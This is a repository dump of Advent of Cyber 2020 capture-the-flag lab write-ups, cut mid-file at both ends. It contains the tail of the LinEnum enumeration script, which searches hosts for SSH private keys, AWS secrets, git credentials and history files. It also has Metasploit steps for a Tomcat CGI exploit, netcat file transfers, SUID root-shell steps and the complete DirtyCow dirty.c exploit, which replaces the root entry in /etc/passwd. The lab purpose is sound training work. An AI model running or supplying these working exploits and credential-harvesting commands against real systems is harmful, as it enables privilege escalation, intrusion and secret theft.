\"$matchedfiles\" ]; then\n\t\t\techo -e \"\\e[00;33m[+] Files with the same capabilities associated with the current user (You may want to try abusing those capabilties):\\e[00m\\n$matchedfiles\"\n\t\t\techo -e \"\\n\"\n\t\t\t#lists the permissions of the files having the same capabilies associated with the current user\n\t\t\tmatchedfilesperms=`echo -e \"$matchedfiles\" | awk '{print $1}' | while read -r f; do ls -la $f ;done 2>/dev/null`\n\t\t\techo -e \"\\e[00;33m[+] Permissions of files with the same capabilities associated with the current user:\\e[00m\\n$matchedfilesperms\"\n\t\t\techo -e \"\\n\"\n\t\t\tif [ \"$matchedfilesperms\" ]; then\n\t\t\t\t#checks if any of the files with same capabilities associated with the current user is writable\n\t\t\t\twritablematchedfiles=`echo -e \"$matchedfiles\" | awk '{print $1}' | while read -r f; do find $f -writable -exec ls -la {} + ;done 2>/dev/null`\n\t\t\t\tif [ \"$writablematchedfiles\" ]; then\n\t\t\t\t\techo -e \"\\e[00;33m[+] User/Group writable files with the same capabilities associated with the current user:\\e[00m\\n$writablematchedfiles\"\n\t\t\t\t\techo -e \"\\n\"\n\t\t\t\tfi\n\t\t\tfi\n\t\tfi\n\tfi\nfi\n\n#look for private keys - thanks djhohnstein\nif [ \"$thorough\" = \"1\" ]; then\nprivatekeyfiles=`grep -rl \"PRIVATE KEY-----\" /home 2>/dev/null`\n\tif [ \"$privatekeyfiles\" ]; then\n \t\techo -e \"\\e[00;33m[+] Private SSH keys found!:\\e[00m\\n$privatekeyfiles\"\n \t\techo -e \"\\n\"\n\tfi\nfi\n\n#look for AWS keys - thanks djhohnstein\nif [ \"$thorough\" = \"1\" ]; then\nawskeyfiles=`grep -rli \"aws_secret_access_key\" /home 2>/dev/null`\n\tif [ \"$awskeyfiles\" ]; then\n \t\techo -e \"\\e[00;33m[+] AWS secret keys found!:\\e[00m\\n$awskeyfiles\"\n \t\techo -e \"\\n\"\n\tfi\nfi\n\n#look for git credential files - thanks djhohnstein\nif [ \"$thorough\" = \"1\" ]; then\ngitcredfiles=`find / -name \".git-credentials\" 2>/dev/null`\n\tif [ \"$gitcredfiles\" ]; then\n \t\techo -e \"\\e[00;33m[+] Git credentials saved on the machine!:\\e[00m\\n$gitcredfiles\"\n \t\techo -e \"\\n\"\n\tfi\nfi\n\n#list all world-writable files excluding /proc and /sys\nif [ \"$thorough\" = \"1\" ]; then\nwwfiles=`find / ! -path \"*/proc/*\" ! -path \"/sys/*\" -perm -2 -type f -exec ls -la {} 2>/dev/null \\;`\n\tif [ \"$wwfiles\" ]; then\n\t\techo -e \"\\e[00;31m[-] World-writable files (excluding /proc and /sys):\\e[00m\\n$wwfiles\" \n\t\techo -e \"\\n\"\n\tfi\nfi\n\nif [ \"$thorough\" = \"1\" ]; then\n\tif [ \"$export\" ] && [ \"$wwfiles\" ]; then\n\t\tmkdir $format/ww-files/ 2>/dev/null\n\t\tfor i in $wwfiles; do cp --parents $i $format/ww-files/; done 2>/dev/null\n\tfi\nfi\n\n#are any .plan files accessible in /home (could contain useful information)\nusrplan=`find /home -iname *.plan -exec ls -la {} \\; -exec cat {} 2>/dev/null \\;`\nif [ \"$usrplan\" ]; then\n echo -e \"\\e[00;31m[-] Plan file permissions and contents:\\e[00m\\n$usrplan\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$usrplan\" ]; then\n mkdir $format/plan_files/ 2>/dev/null\n for i in $usrplan; do cp --parents $i $format/plan_files/; done 2>/dev/null\nfi\n\nbsdusrplan=`find /usr/home -iname *.plan -exec ls -la {} \\; -exec cat {} 2>/dev/null \\;`\nif [ \"$bsdusrplan\" ]; then\n echo -e \"\\e[00;31m[-] Plan file permissions and contents:\\e[00m\\n$bsdusrplan\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$bsdusrplan\" ]; then\n mkdir $format/plan_files/ 2>/dev/null\n for i in $bsdusrplan; do cp --parents $i $format/plan_files/; done 2>/dev/null\nfi\n\n#are there any .rhosts files accessible - these may allow us to login as another user etc.\nrhostsusr=`find /home -iname *.rhosts -exec ls -la {} 2>/dev/null \\; -exec cat {} 2>/dev/null \\;`\nif [ \"$rhostsusr\" ]; then\n echo -e \"\\e[00;33m[+] rhost config file(s) and file contents:\\e[00m\\n$rhostsusr\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$rhostsusr\" ]; then\n mkdir $format/rhosts/ 2>/dev/null\n for i in $rhostsusr; do cp --parents $i $format/rhosts/; done 2>/dev/null\nfi\n\nbsdrhostsusr=`find /usr/home -iname *.rhosts -exec ls -la {} 2>/dev/null \\; -exec cat {} 2>/dev/null \\;`\nif [ \"$bsdrhostsusr\" ]; then\n echo -e \"\\e[00;33m[+] rhost config file(s) and file contents:\\e[00m\\n$bsdrhostsusr\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$bsdrhostsusr\" ]; then\n mkdir $format/rhosts 2>/dev/null\n for i in $bsdrhostsusr; do cp --parents $i $format/rhosts/; done 2>/dev/null\nfi\n\nrhostssys=`find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \\; -exec cat {} 2>/dev/null \\;`\nif [ \"$rhostssys\" ]; then\n echo -e \"\\e[00;33m[+] Hosts.equiv file and contents: \\e[00m\\n$rhostssys\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$rhostssys\" ]; then\n mkdir $format/rhosts/ 2>/dev/null\n for i in $rhostssys; do cp --parents $i $format/rhosts/; done 2>/dev/null\nfi\n\n#list nfs shares/permisisons etc.\nnfsexports=`ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null`\nif [ \"$nfsexports\" ]; then\n echo -e \"\\e[00;31m[-] NFS config details: \\e[00m\\n$nfsexports\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$nfsexports\" ]; then\n mkdir $format/etc-export/ 2>/dev/null\n cp /etc/exports $format/etc-export/exports 2>/dev/null\nfi\n\nif [ \"$thorough\" = \"1\" ]; then\n #phackt\n #displaying /etc/fstab\n fstab=`cat /etc/fstab 2>/dev/null`\n if [ \"$fstab\" ]; then\n echo -e \"\\e[00;31m[-] NFS displaying partitions and filesystems - you need to check if exotic filesystems\\e[00m\"\n echo -e \"$fstab\"\n echo -e \"\\n\"\n fi\nfi\n\n#looking for credentials in /etc/fstab\nfstab=`grep username /etc/fstab 2>/dev/null |awk '{sub(/.*\\username=/,\"\");sub(/\\,.*/,\"\")}1' 2>/dev/null| xargs -r echo username: 2>/dev/null; grep password /etc/fstab 2>/dev/null |awk '{sub(/.*\\password=/,\"\");sub(/\\,.*/,\"\")}1' 2>/dev/null| xargs -r echo password: 2>/dev/null; grep domain /etc/fstab 2>/dev/null |awk '{sub(/.*\\domain=/,\"\");sub(/\\,.*/,\"\")}1' 2>/dev/null| xargs -r echo domain: 2>/dev/null`\nif [ \"$fstab\" ]; then\n echo -e \"\\e[00;33m[+] Looks like there are credentials in /etc/fstab!\\e[00m\\n$fstab\"\n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$fstab\" ]; then\n mkdir $format/etc-exports/ 2>/dev/null\n cp /etc/fstab $format/etc-exports/fstab done 2>/dev/null\nfi\n\nfstabcred=`grep cred /etc/fstab 2>/dev/null |awk '{sub(/.*\\credentials=/,\"\");sub(/\\,.*/,\"\")}1' 2>/dev/null | xargs -I{} sh -c 'ls -la {}; cat {}' 2>/dev/null`\nif [ \"$fstabcred\" ]; then\n echo -e \"\\e[00;33m[+] /etc/fstab contains a credentials file!\\e[00m\\n$fstabcred\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$fstabcred\" ]; then\n mkdir $format/etc-exports/ 2>/dev/null\n cp /etc/fstab $format/etc-exports/fstab done 2>/dev/null\nfi\n\n#use supplied keyword and cat *.conf files for potential matches - output will show line number within relevant file path where a match has been located\nif [ \"$keyword\" = \"\" ]; then\n echo -e \"[-] Can't search *.conf files as no keyword was entered\\n\" \n else\n confkey=`find / -maxdepth 4 -name *.conf -type f -exec grep -Hn $keyword {} \\; 2>/dev/null`\n if [ \"$confkey\" ]; then\n echo -e \"\\e[00;31m[-] Find keyword ($keyword) in .conf files (recursive 4 levels - output format filepath:identified line number where keyword appears):\\e[00m\\n$confkey\" \n echo -e \"\\n\" \n else \n\techo -e \"\\e[00;31m[-] Find keyword ($keyword) in .conf files (recursive 4 levels):\\e[00m\" \n\techo -e \"'$keyword' not found in any .conf files\" \n\techo -e \"\\n\" \n fi\nfi\n\nif [ \"$keyword\" = \"\" ]; then\n :\n else\n if [ \"$export\" ] && [ \"$confkey\" ]; then\n\t confkeyfile=`find / -maxdepth 4 -name *.conf -type f -exec grep -lHn $keyword {} \\; 2>/dev/null`\n mkdir --parents $format/keyword_file_matches/config_files/ 2>/dev/null\n for i in $confkeyfile; do cp --parents $i $format/keyword_file_matches/config_files/ ; done 2>/dev/null\n fi\nfi\n\n#use supplied keyword and cat *.php files for potential matches - output will show line number within relevant file path where a match has been located\nif [ \"$keyword\" = \"\" ]; then\n echo -e \"[-] Can't search *.php files as no keyword was entered\\n\" \n else\n phpkey=`find / -maxdepth 10 -name *.php -type f -exec grep -Hn $keyword {} \\; 2>/dev/null`\n if [ \"$phpkey\" ]; then\n echo -e \"\\e[00;31m[-] Find keyword ($keyword) in .php files (recursive 10 levels - output format filepath:identified line number where keyword appears):\\e[00m\\n$phpkey\" \n echo -e \"\\n\" \n else \n echo -e \"\\e[00;31m[-] Find keyword ($keyword) in .php files (recursive 10 levels):\\e[00m\" \n echo -e \"'$keyword' not found in any .php files\" \n echo -e \"\\n\" \n fi\nfi\n\nif [ \"$keyword\" = \"\" ]; then\n :\n else\n if [ \"$export\" ] && [ \"$phpkey\" ]; then\n phpkeyfile=`find / -maxdepth 10 -name *.php -type f -exec grep -lHn $keyword {} \\; 2>/dev/null`\n mkdir --parents $format/keyword_file_matches/php_files/ 2>/dev/null\n for i in $phpkeyfile; do cp --parents $i $format/keyword_file_matches/php_files/ ; done 2>/dev/null\n fi\nfi\n\n#use supplied keyword and cat *.log files for potential matches - output will show line number within relevant file path where a match has been located\nif [ \"$keyword\" = \"\" ];then\n echo -e \"[-] Can't search *.log files as no keyword was entered\\n\" \n else\n logkey=`find / -maxdepth 4 -name *.log -type f -exec grep -Hn $keyword {} \\; 2>/dev/null`\n if [ \"$logkey\" ]; then\n echo -e \"\\e[00;31m[-] Find keyword ($keyword) in .log files (recursive 4 levels - output format filepath:identified line number where keyword appears):\\e[00m\\n$logkey\" \n echo -e \"\\n\" \n else \n\techo -e \"\\e[00;31m[-] Find keyword ($keyword) in .log files (recursive 4 levels):\\e[00m\" \n\techo -e \"'$keyword' not found in any .log files\"\n\techo -e \"\\n\" \n fi\nfi\n\nif [ \"$keyword\" = \"\" ];then\n :\n else\n if [ \"$export\" ] && [ \"$logkey\" ]; then\n logkeyfile=`find / -maxdepth 4 -name *.log -type f -exec grep -lHn $keyword {} \\; 2>/dev/null`\n\t mkdir --parents $format/keyword_file_matches/log_files/ 2>/dev/null\n for i in $logkeyfile; do cp --parents $i $format/keyword_file_matches/log_files/ ; done 2>/dev/null\n fi\nfi\n\n#use supplied keyword and cat *.ini files for potential matches - output will show line number within relevant file path where a match has been located\nif [ \"$keyword\" = \"\" ];then\n echo -e \"[-] Can't search *.ini files as no keyword was entered\\n\" \n else\n inikey=`find / -maxdepth 4 -name *.ini -type f -exec grep -Hn $keyword {} \\; 2>/dev/null`\n if [ \"$inikey\" ]; then\n echo -e \"\\e[00;31m[-] Find keyword ($keyword) in .ini files (recursive 4 levels - output format filepath:identified line number where keyword appears):\\e[00m\\n$inikey\" \n echo -e \"\\n\" \n else \n\techo -e \"\\e[00;31m[-] Find keyword ($keyword) in .ini files (recursive 4 levels):\\e[00m\" \n\techo -e \"'$keyword' not found in any .ini files\" \n\techo -e \"\\n\"\n fi\nfi\n\nif [ \"$keyword\" = \"\" ];then\n :\n else\n if [ \"$export\" ] && [ \"$inikey\" ]; then\n\t inikey=`find / -maxdepth 4 -name *.ini -type f -exec grep -lHn $keyword {} \\; 2>/dev/null`\n mkdir --parents $format/keyword_file_matches/ini_files/ 2>/dev/null\n for i in $inikey; do cp --parents $i $format/keyword_file_matches/ini_files/ ; done 2>/dev/null\n fi\nfi\n\n#quick extract of .conf files from /etc - only 1 level\nallconf=`find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} \\; 2>/dev/null`\nif [ \"$allconf\" ]; then\n echo -e \"\\e[00;31m[-] All *.conf files in /etc (recursive 1 level):\\e[00m\\n$allconf\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$allconf\" ]; then\n mkdir $format/conf-files/ 2>/dev/null\n for i in $allconf; do cp --parents $i $format/conf-files/; done 2>/dev/null\nfi\n\n#extract any user history files that are accessible\nusrhist=`ls -la ~/.*_history 2>/dev/null`\nif [ \"$usrhist\" ]; then\n echo -e \"\\e[00;31m[-] Current user's history files:\\e[00m\\n$usrhist\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$usrhist\" ]; then\n mkdir $format/history_files/ 2>/dev/null\n for i in $usrhist; do cp --parents $i $format/history_files/; done 2>/dev/null\nfi\n\n#can we read roots *_history files - could be passwords stored etc.\nroothist=`ls -la /root/.*_history 2>/dev/null`\nif [ \"$roothist\" ]; then\n echo -e \"\\e[00;33m[+] Root's history files are accessible!\\e[00m\\n$roothist\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$roothist\" ]; then\n mkdir $format/history_files/ 2>/dev/null\n cp $roothist $format/history_files/ 2>/dev/null\nfi\n\n#all accessible .bash_history files in /home\ncheckbashhist=`find /home -name .bash_history -print -exec cat {} 2>/dev/null \\;`\nif [ \"$checkbashhist\" ]; then\n echo -e \"\\e[00;31m[-] Location and contents (if accessible) of .bash_history file(s):\\e[00m\\n$checkbashhist\"\n echo -e \"\\n\"\nfi\n\n#any .bak files that may be of interest\nbakfiles=`find / -name *.bak -type f 2/dev/null`\nif [ \"$readmail\" ]; then\n echo -e \"\\e[00;31m[-] Any interesting mail in /var/mail:\\e[00m\\n$readmail\" \n echo -e \"\\n\"\nfi\n\n#can we read roots mail\nreadmailroot=`head /var/mail/root 2>/dev/null`\nif [ \"$readmailroot\" ]; then\n echo -e \"\\e[00;33m[+] We can read /var/mail/root! (snippet below)\\e[00m\\n$readmailroot\" \n echo -e \"\\n\"\nfi\n\nif [ \"$export\" ] && [ \"$readmailroot\" ]; then\n mkdir $format/mail-from-root/ 2>/dev/null\n cp $readmailroot $format/mail-from-root/ 2>/dev/null\nfi\n}\n\ndocker_checks()\n{\n\n#specific checks - check to see if we're in a docker container\ndockercontainer=` grep -i docker /proc/self/cgroup 2>/dev/null; find / -name \"*dockerenv*\" -exec ls -la {} \\; 2>/dev/null`\nif [ \"$dockercontainer\" ]; then\n echo -e \"\\e[00;33m[+] Looks like we're in a Docker container:\\e[00m\\n$dockercontainer\" \n echo -e \"\\n\"\nfi\n\n#specific checks - check to see if we're a docker host\ndockerhost=`docker --version 2>/dev/null; docker ps -a 2>/dev/null`\nif [ \"$dockerhost\" ]; then\n echo -e \"\\e[00;33m[+] Looks like we're hosting Docker:\\e[00m\\n$dockerhost\" \n echo -e \"\\n\"\nfi\n\n#specific checks - are we a member of the docker group\ndockergrp=`id | grep -i docker 2>/dev/null`\nif [ \"$dockergrp\" ]; then\n echo -e \"\\e[00;33m[+] We're a member of the (docker) group - could possibly misuse these rights!\\e[00m\\n$dockergrp\" \n echo -e \"\\n\"\nfi\n\n#specific checks - are there any docker files present\ndockerfiles=`find / -name Dockerfile -exec ls -l {} 2>/dev/null \\;`\nif [ \"$dockerfiles\" ]; then\n echo -e \"\\e[00;31m[-] Anything juicy in the Dockerfile:\\e[00m\\n$dockerfiles\" \n echo -e \"\\n\"\nfi\n\n#specific checks - are there any docker files present\ndockeryml=`find / -name docker-compose.yml -exec ls -l {} 2>/dev/null \\;`\nif [ \"$dockeryml\" ]; then\n echo -e \"\\e[00;31m[-] Anything juicy in docker-compose.yml:\\e[00m\\n$dockeryml\" \n echo -e \"\\n\"\nfi\n}\n\nlxc_container_checks()\n{\n\n#specific checks - are we in an lxd/lxc container\nlxccontainer=`grep -qa container=lxc /proc/1/environ 2>/dev/null`\nif [ \"$lxccontainer\" ]; then\n echo -e \"\\e[00;33m[+] Looks like we're in a lxc container:\\e[00m\\n$lxccontainer\"\n echo -e \"\\n\"\nfi\n\n#specific checks - are we a member of the lxd group\nlxdgroup=`id | grep -i lxd 2>/dev/null`\nif [ \"$lxdgroup\" ]; then\n echo -e \"\\e[00;33m[+] We're a member of the (lxd) group - could possibly misuse these rights!\\e[00m\\n$lxdgroup\"\n echo -e \"\\n\"\nfi\n}\n\nfooter()\n{\necho -e \"\\e[00;33m### SCAN COMPLETE ####################################\\e[00m\" \n}\n\ncall_each()\n{\n header\n debug_info\n system_info\n user_info\n environmental_info\n job_info\n networking_info\n services_info\n software_configs\n interesting_files\n docker_checks\n lxc_container_checks\n footer\n}\n\nwhile getopts \"h:k:r:e:st\" option; do\n case \"${option}\" in\n k) keyword=${OPTARG};;\n r) report=${OPTARG}\"-\"`date +\"%d-%m-%y\"`;;\n e) export=${OPTARG};;\n s) sudopass=1;;\n t) thorough=1;;\n h) usage; exit;;\n *) usage; exit;;\n esac\ndone\n\ncall_each | tee -a $report 2> /dev/null\n#EndOfScript\n" }, { "path": "Advent-of-Cyber-2020/Day-11-The_Rogue_Gnome/README.md", "content": "# The Rogue Gnome\n\nBefore we begin, we're going to need to deploy two Instances:\n\n\t1. The THM AttackBox by pressing the \"Start AttackBox\" button at the top-right of the page.\n\t2. The vulnerable Instance attached to this task by pressing the \"Deploy\" button at the top-right of this task/day.\n\n- What type of privilege escalation involves using a user account to execute commands as an administrator?\n\n\t- `vertical`\n\n- What is the name of the file that contains a list of users who are a part of the sudo group?\n\n\n\t- `sudoers`\n\n- Use SSH to log in to the vulnerable machine like so: ssh cmnatic@MACHINE_IP\nInput the following password when prompted: aoc2020\n\n\tno answer needed\n\n- Enumerate the machine for executables that have had the SUID permission set. Look at the output and use a mixture of GTFObins and your researching skills to learn how to exploit this binary.\nYou may find uploading some of the enumeration scripts that were used during today's task to be useful.\n\n\tno answer needed\n\n\t- On your machine `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh`\n\t- `nc -lvnp 4444 < linEnum.sh`\n\t- On target `nc -w 3 4444 > linEnum.sh`\n\t- On target `chmod +x && ./linEnum.sh`\n\t- We can see there is `/bin/bash`. Good.\n\t- This could be done also with `find / -perm -u=s -type f 2>/dev/null`\n\t- On target `bash -p`\n\t- `cat /root/flag.txt`\n\n- Use this executable to launch a system shell as root.\nWhat are the contents of the file located at /root/flag.txt?\n\n\t- `thm{*****************}`\n\n\n\n\n\n## see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-12-Ready,_set,_elf./README.md", "content": "# Ready, set, elf.\n\n\n- What is the version number of the web server?\n\n\t- `nmap -sV ` (Remember, if it says \"host seems down\", use `-Pn`, look for what it means)\n\t- `9.0.17`\n\n- What CVE can be used to create a Meterpreter entry onto the machine? (Format: CVE-XXXX-XXXX)\n\n\t- `msfconsole`\n\t- `search tomcat 9`\n\t- It outputs `exploit/windows/http/tomcat_cgi_cmdlineargs 2019-04-10`. googling then...\n\t- `CVE-2019-0232`\n\n- Set your Metasploit settings appropriately and gain a foothold onto the deployed machine.\n\n\t no answer needed\n\n\t- after search, It should outputs only one exploit, anyway use `use 0` if the output is only one, or the appropriate number\n\t- `set RHOSTS `\n\t- `set RPORT 8080`\n\t- `set LHOST `\n\t- `set targeturi /cgi-bin/elfwhacker.bat`\n\t- `run` or `exploit`\n\n- What are the contents of flag1.txt?\n\n\t- `cat flag1.txt`\n\t- `thm{********_***_***_*****}`\n\n- Looking for a challenge? Try to find out some of the vulnerabilities present to escalate your privileges!\n\n\t no answer needed\n\n\n\n" }, { "path": "Advent-of-Cyber-2020/Day-13-Coal_for_Christmas/README.md", "content": "# Coal for Christmas\n\n- Hi Santa, hop in your sleigh and deploy this machine!\n\n\t no answer needed\n\n- nmap \n\n\t no answer needed\n\n\t- `nmap `\n\n- What old, deprecated protocol and service is running?\n\n\t- `telnet`\n\n- What credential was left for you?\n\n\t- `telnet 23`\n\t- `clauschristmas`\n\n- What distribution of Linux and version number is this server running?\n\n\t- `uname -a`\n\t- `Ubuntu 12.04`\n\n- Who got here first?\n\n\t- `cat cookies_and_milk.txt`\n\t- `grinch`\n\n- This cookies_and_milk.txt file looks like a modified rendition of a DirtyCow exploit, usually written in C. Find a copy of that original file online, and get it on the target box. You can do this with some simple file transfer methods like netcat, or spinning up a quick Python HTTP server... or you can simply copy-and-paste it into a text editor on the box!\n\n\t no answer needed\n\n\t- [dirtycow](https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c)\n\t- On your machine `nc -lnvp 4444 < dirty.c`\n\t- On target `nc -w 3 4444 > dirty.c`\n\t\n- What is the verbatim syntax you can use to compile, taken from the real C source code comments?\n\n\t- `gcc -pthread dirty.c -o dirty -lcrypt`\n\n- Run the commands to compile the exploit, and run it.\nWhat \"new\" username was created, with the default operations of the real C source code?\n\n\t- `./dirty` and then enter the password you've chosen\n\t- `firefart`\n\n- What is the MD5 hash output?\n\n\t- `cat message_from_the_grinch.txt`\n\t- `touch coal`\n\t- `tree | md5sum`\n\t- `********************************`\n\n\n\n\n### see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-13-Coal_for_Christmas/dirty.c", "content": "//\n// This exploit uses the pokemon exploit of the dirtycow vulnerability\n// as a base and automatically generates a new passwd line.\n// The user will be prompted for the new password when the binary is run.\n// The original /etc/passwd file is then backed up to /tmp/passwd.bak\n// and overwrites the root account with the generated line.\n// After running the exploit you should be able to login with the newly\n// created user.\n//\n// To use this exploit modify the user values according to your needs.\n// The default is \"firefart\".\n//\n// Original exploit (dirtycow's ptrace_pokedata \"pokemon\" method):\n// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c\n//\n// Compile with:\n// gcc -pthread dirty.c -o dirty -lcrypt\n//\n// Then run the newly create binary by either doing:\n// \"./dirty\" or \"./dirty my-new-password\"\n//\n// Afterwards, you can either \"su firefart\" or \"ssh firefart@...\"\n//\n// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!\n// mv /tmp/passwd.bak /etc/passwd\n//\n// Exploit adopted by Christian \"FireFart\" Mehlmauer\n// https://firefart.at\n//\n\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\nconst char *filename = \"/etc/passwd\";\nconst char *backup_filename = \"/tmp/passwd.bak\";\nconst char *salt = \"firefart\";\n\nint f;\nvoid *map;\npid_t pid;\npthread_t pth;\nstruct stat st;\n\nstruct Userinfo {\n char *username;\n char *hash;\n int user_id;\n int group_id;\n char *info;\n char *home_dir;\n char *shell;\n};\n\nchar *generate_password_hash(char *plaintext_pw) {\n return crypt(plaintext_pw, salt);\n}\n\nchar *generate_passwd_line(struct Userinfo u) {\n const char *format = \"%s:%s:%d:%d:%s:%s:%s\\n\";\n int size = snprintf(NULL, 0, format, u.username, u.hash,\n u.user_id, u.group_id, u.info, u.home_dir, u.shell);\n char *ret = malloc(size + 1);\n sprintf(ret, format, u.username, u.hash, u.user_id,\n u.group_id, u.info, u.home_dir, u.shell);\n return ret;\n}\n\nvoid *madviseThread(void *arg) {\n int i, c = 0;\n for(i = 0; i < 200000000; i++) {\n c += madvise(map, 100, MADV_DONTNEED);\n }\n printf(\"madvise %d\\n\\n\", c);\n}\n\nint copy_file(const char *from, const char *to) {\n // check if target file already exists\n if(access(to, F_OK) != -1) {\n printf(\"File %s already exists! Please delete it and run again\\n\",\n to);\n return -1;\n }\n\n char ch;\n FILE *source, *target;\n\n source = fopen(from, \"r\");\n if(source == NULL) {\n return -1;\n }\n target = fopen(to, \"w\");\n if(target == NULL) {\n fclose(source);\n return -1;\n }\n\n while((ch = fgetc(source)) != EOF) {\n fputc(ch, target);\n }\n\n printf(\"%s successfully backed up to %s\\n\",\n from, to);\n\n fclose(source);\n fclose(target);\n\n return 0;\n}\n\nint main(int argc, char *argv[])\n{\n // backup file\n int ret = copy_file(filename, backup_filename);\n if (ret != 0) {\n exit(ret);\n }\n\n struct Userinfo user;\n // set values, change as needed\n user.username = \"firefart\";\n user.user_id = 0;\n user.group_id = 0;\n user.info = \"pwned\";\n user.home_dir = \"/root\";\n user.shell = \"/bin/bash\";\n\n char *plaintext_pw;\n\n if (argc >= 2) {\n plaintext_pw = argv[1];\n printf(\"Please enter the new password: %s\\n\", plaintext_pw);\n } else {\n plaintext_pw = getpass(\"Please enter the new password: \");\n }\n\n user.hash = generate_password_hash(plaintext_pw);\n char *complete_passwd_line = generate_passwd_line(user);\n printf(\"Complete line:\\n%s\\n\", complete_passwd_line);\n\n f = open(filename, O_RDONLY);\n fstat(f, &st);\n map = mmap(NULL,\n st.st_size + sizeof(long),\n PROT_READ,\n MAP_PRIVATE,\n f,\n 0);\n printf(\"mmap: %lx\\n\",(unsigned long)map);\n pid = fork();\n if(pid) {\n waitpid(pid, NULL, 0);\n int u, i, o, c = 0;\n int l=strlen(complete_passwd_line);\n for(i = 0; i < 10000/l; i++) {\n for(o = 0; o < l; o++) {\n for(u = 0; u < 10000; u++) {\n c += ptrace(PTRACE_POKETEXT,\n pid,\n map + o,\n *((long*)(complete_passwd_line + o)));\n }\n }\n }\n printf(\"ptrace %d\\n\",c);\n }\n else {\n pthread_create(&pth,\n NULL,\n madviseThread,\n NULL);\n ptrace(PTRACE_TRACEME);\n kill(getpid(), SIGSTOP);\n pthread_join(pth,NULL);\n }\n\n printf(\"Done! Check %s to see if the new user was created.\\n\", filename);\n printf(\"You can log in with the username '%s' and the password '%s'.\\n\\n\",\n user.username, plaintext_pw);\n printf(\"\\nDON'T FORGET TO RESTORE! $ mv %s %s\\n\",\n backup_filename, filename);\n return 0;\n}\n\n" }, { "path": "Advent-of-Cyber-2020/Day-14-Where's Rudolph?/README.md", "content": "# Where's Rudolph?\n\n- What URL will take me directly to Rudolph's Reddit comment history?\n\n\t- Google is your best friend. `https://www.reddit.com/user/IGuidetheClaus2020/comments/`\n\n- According to Rudolph, where was he born?\n\n\t- `Chicago`\n\n- Rudolph mentions Robert. Can you use Google to tell me Robert's last name?\n\n\t- Google is your friend.. `May`\n\n- On what other social media platform might Rudolph have an account?\n\n\t- Twitter Search\n\t- `https://twitter.com/IGuideClaus2020`\n\t- `twitter`\n\n- What is Rudolph's username on that platform?\n\n\t- `IGuideClaus2020`\n\n- What appears to be Rudolph's favorite TV show right now?\n\n\t- `bachelorette`, by twitter feed.\n\n- Based on Rudolph's post history, he took part in a parade. Where did the parade take place?\n\n\t- `Chicago`\n\n- Okay, you found the city, but where specifically was one of the photos taken?\n\n\t- [photo with higher resolution](https://twitter.com/IGuideClaus2020/status/1331615839318138883)\n\t- Upload on [exif.regex.info](http://exif.regex.info)\n\t- `41.891815, -87.624277`\n\n- Did you find a flag too?\n\n\t- `{FLAG}**********************`\n\n- Has Rudolph been pwned? What password of his appeared in a breach?\n\n\t- [Scylla Search](https://scylla.sh/api)\n\t- The email is shown on Twitter `rudolphthered@hotmail.com`.\n\t- `*******`\n\n- Based on all the information gathered. It's likely that Rudolph is in the Windy City and is staying in a hotel on Magnificent Mile. What are the street numbers of the hotel address?\n\n\t- `41.891815, -87.624277` on Google Maps\n\t- `Chicago Marriott Downtown` on Google Search\n\t- `540`\n\n\n\n\n### see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-15-There's a Python in my stocking!/README.md", "content": "# There's a Python in my stocking!\n\n- What's the output of True + True?\n\n\t- `2`\n\n- What's the database for installing other peoples libraries called?\n\n\t- `PyPi`\n\n- What is the output of bool(\"False\")?\n\n\t- `True`\n\n- What library lets us download the HTML of a webpage?\n\n\t- `requests`\n\n- What is the output of the program provided in \"Code to analyse for Question 5\" in today's material?\n(This code is located above the Christmas banner and below the links in the main body of this task)\n\n\t- `[1, 2, 3, 6]`\n\n- What causes the previous task to output that?\n\n\t- `pass by reference`\n\n\n\n\n### see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-16-Help! Where is Santa?/README.md", "content": "# Help! Where is Santa?\n\nOh no! Santa 🎅 has taken off, leaving you -- the faithful elves behind! Can you help find Santa's location?\n\nSanta has a webpage at `/static/index.html`\n\n- What is the port number for the web server?\n\n\t- `nmap -p -10000 `\n\t- `8000`\n\n- What is the directory for the API, without the API key?\n\n\t- Visit `http://:8000/` and inspect code\n\t- `/api/`\n\n- Where is Santa right now?\n\t\n\t- Change the `TARGET_API` in `api_fuzzer.py`\n\t- `python3 api_fuzzer.py`\n\t- `Winter Wonderland, Hyde Park, London`\n\n- Find out the correct API key. Remember, this is an odd number between 0-100. After too many attempts, Santa's Sled will block you. \nTo unblock yourself, simply terminate and re-deploy the target instance ()\n\n\t- `57`\n\n\n\n\n### see you ...\n" }, { "path": "Advent-of-Cyber-2020/Day-16-Help! Where is Santa?/api_fuzzer.py", "content": "import requests\n\nTARGET_API = \"HERE YOUR TARGET_IP\"\n\nfor i in range(0, 100):\n if i %2 == 1:\n response = requests.get('http://' + TARGET_API + ':8000/api/{}'.format(str(i)))\n print(str(i) + \" : \" + str(response.status_code))\n print(response.text)\n" }, { "path": "Advent-of-Cyber-2020/Day-17-ReverseELFneering/README.md", "content": "# ReverseELFneering\n\nUsername: elfmceager\n\nPassword: adventofcyber\n\nUse your new-found knowledge of Radare2 to analyse the \"challenge1\" file in the Instance that is attached to this task to answer the questions below.\n\nConnect by ssh to the 